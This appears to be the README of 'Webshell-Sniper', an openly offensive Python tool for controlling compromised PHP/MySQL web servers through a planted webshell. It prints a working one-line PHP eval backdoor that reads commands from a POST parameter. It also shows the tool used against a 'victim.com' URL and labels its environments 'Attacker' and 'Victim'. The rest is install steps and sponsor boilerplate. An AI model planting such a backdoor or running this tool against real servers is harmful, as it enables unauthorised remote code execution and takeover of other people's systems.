Awesome
Webshell-Sniper
A webshell manager via terminal
Usage :
Usage :
python webshell-sniper.py [URL] [METHOD] [AUTH]
Example :
python webshell-sniper.py http://127.0.0.1/c.php POST c
Author :
WangYihang <wangyihanger@gmail.com>
# cat /var/www/html/index.php
<?php eval($_POST['s3cr3t']);?>
# python webshell-sniper.py http://victim.com/index.php POST s3cr3t
...
Installation:
git clone https://github.com/WangYihang/Webshell-Sniper
cd Webshell-Sniper
pip install -r requirements.txt
Example :
v1.1.2
Compatibility :
Enviroment :
Attacker :
Linux
python 2.7
Victim :
apache 2.4
php 7.0
Addations:
- This tool only support to run on unix-like system.
- It is able to help user control web server which is running PHP or MySQL.
Contributors
This project exists thanks to all the people who contribute. <a href="https://github.com/WangYihang/Webshell-Sniper/graphs/contributors"><img src="https://opencollective.com/Webshell-Sniper/contributors.svg?width=890&button=false" /></a>
Backers
Thank you to all our backers! 🙏 [Become a backer]
<a href="https://opencollective.com/Webshell-Sniper#backers" target="_blank"><img src="https://opencollective.com/Webshell-Sniper/backers.svg?width=890"></a>
Sponsors
Support this project by becoming a sponsor. Your logo will show up here with a link to your website. [Become a sponsor]
<a href="https://opencollective.com/Webshell-Sniper/sponsor/0/website" target="_blank"><img src="https://opencollective.com/Webshell-Sniper/sponsor/0/avatar.svg"></a> <a href="https://opencollective.com/Webshell-Sniper/sponsor/1/website" target="_blank"><img src="https://opencollective.com/Webshell-Sniper/sponsor/1/avatar.svg"></a> <a href="https://opencollective.com/Webshell-Sniper/sponsor/2/website" target="_blank"><img src="https://opencollective.com/Webshell-Sniper/sponsor/2/avatar.svg"></a> <a href="https://opencollective.com/Webshell-Sniper/sponsor/3/website" target="_blank"><img src="https://opencollective.com/Webshell-Sniper/sponsor/3/avatar.svg"></a> <a href="https://opencollective.com/Webshell-Sniper/sponsor/4/website" target="_blank"><img src="https://opencollective.com/Webshell-Sniper/sponsor/4/avatar.svg"></a> <a href="https://opencollective.com/Webshell-Sniper/sponsor/5/website" target="_blank"><img src="https://opencollective.com/Webshell-Sniper/sponsor/5/avatar.svg"></a> <a href="https://opencollective.com/Webshell-Sniper/sponsor/6/website" target="_blank"><img src="https://opencollective.com/Webshell-Sniper/sponsor/6/avatar.svg"></a> <a href="https://opencollective.com/Webshell-Sniper/sponsor/7/website" target="_blank"><img src="https://opencollective.com/Webshell-Sniper/sponsor/7/avatar.svg"></a> <a href="https://opencollective.com/Webshell-Sniper/sponsor/8/website" target="_blank"><img src="https://opencollective.com/Webshell-Sniper/sponsor/8/avatar.svg"></a> <a href="https://opencollective.com/Webshell-Sniper/sponsor/9/website" target="_blank"><img src="https://opencollective.com/Webshell-Sniper/sponsor/9/avatar.svg"></a>